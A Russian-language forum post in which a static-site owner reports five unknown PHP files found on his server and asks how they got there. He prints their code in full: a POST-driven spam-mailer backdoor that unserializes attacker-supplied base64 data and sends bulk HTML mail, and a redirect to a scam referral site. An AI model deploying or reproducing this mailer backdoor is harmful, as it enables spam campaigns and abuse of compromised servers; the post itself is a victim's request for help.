Имеется простой статичный сайт из 1 страницы HTML. Никаких входящих данных. Это просто статичная страница. Недавно зашел залить внутрь сервера пару файлов. Заметил 5 файлов, неизвестного происхождения:
ddubvmr.php
hqdlahg.php
shemubb.php
yhfrhqn.php
yxbmjpw.php
Контент в них одинаковый. Либо в одном из них данный код:
<?php
if (isset($_POST['task']))
{
error_reporting(E_ALL);
ini_set('display_errors', TRUE);
ini_set('memory_limit', '512M');
set_time_limit(0);
ini_set('max_execution_time',0);
ini_set('set_time_limit',0);
$x = unserialize(base64_decode($_POST['task']));
if ($x==false) {exit();}
$send_from = base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
foreach ($x as $arr)
{
echo $arr['to']."\r\n";
$arr['msg'] = str_replace('[send_from_url]',$send_from,$arr['msg']);
mail($arr['to'],$arr['subj'],$arr['msg'],"MIME-Version: 1.0\r\nContent-type: text/html; charset=windows-1251\r\n");
}
exit('SEND OK');
}
Либо этот локатор:
<?php
header('Location: http://moneevdi.ru/');
?>
Не понятно ЧТО ЭТО и ОТКУДА ЭТО.
Хостер ничего не знает. Видимо чтобы отделаться сказал, что НА САЙТЕ "ДЫРКА"... Но блин сайт статичный из 1-го файла.
Что думаете, может кто либо сталкивался с этим?
Добавлено через 02:28 сек.
Как я понял это какой-то вирус, который использует сайт для отправки спама?
Добавлено через 03:24 сек.
Перейдя по сайту header('Location:
http://moneevdi.ru/'); понял что это какой то развод, сайт-обманка... но как их файлы проникли в мой сервер?
Добавлено через 05:51 сек.
В итоге вышел на сайт
http://www.utrader.com/OpenAccount/?campaign=726 .... видимо это просто реферал для получения %... но как найти ту "дыру" по которой забросили этот файл.
могли ли весь хостинг взломать? то есть не через мой сайт, а через соседний, после чего закинули такой файл всем тем у кого есть активные сайты
Изменил: ШЕДЕВР (03.09.2013 / 18:07)
